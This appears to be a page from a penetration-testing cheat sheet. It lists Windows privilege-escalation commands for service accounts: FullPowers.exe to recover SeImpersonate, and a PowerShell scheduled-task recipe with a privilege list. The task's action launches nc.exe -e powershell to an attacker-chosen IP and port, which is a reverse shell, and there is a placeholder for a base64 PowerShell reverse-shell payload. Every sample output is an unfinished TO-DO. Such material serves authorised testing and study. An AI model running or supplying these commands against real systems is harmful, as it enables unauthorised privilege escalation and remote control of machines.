Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Recover SeImpresonate
.\FullPowers.exe -c "whoami /priv"
Sample Output:
TO-DO# Revshell
.\FullPowers.exe -c "<POWERSHELL_3_BASE64>"
Sample Output:
TO-DORef: FullPower
Abuse #2: Recover tokens via schedule task
# Create a list of privileges
[System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege"
Sample Output:
TO-DO# Create a Principal for the task
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "<SERVICE_ACCOUNT>" -LogonType ServiceAccount -RequiredPrivilege $Privs
Sample Output:
TO-DO# Create an action for the task
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `C:\\Windows\\Tasks\\nc.exe -e powershell <LOCAL_IP> <LOCAL_PORT>`""
Sample Output:
TO-DO# Create the task
Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask" -Principal $TaskPrincipal
Sample Output:
TO-DO# Start the task
Start-ScheduledTask -TaskName "SomeTask"
Sample Output:
TO-DO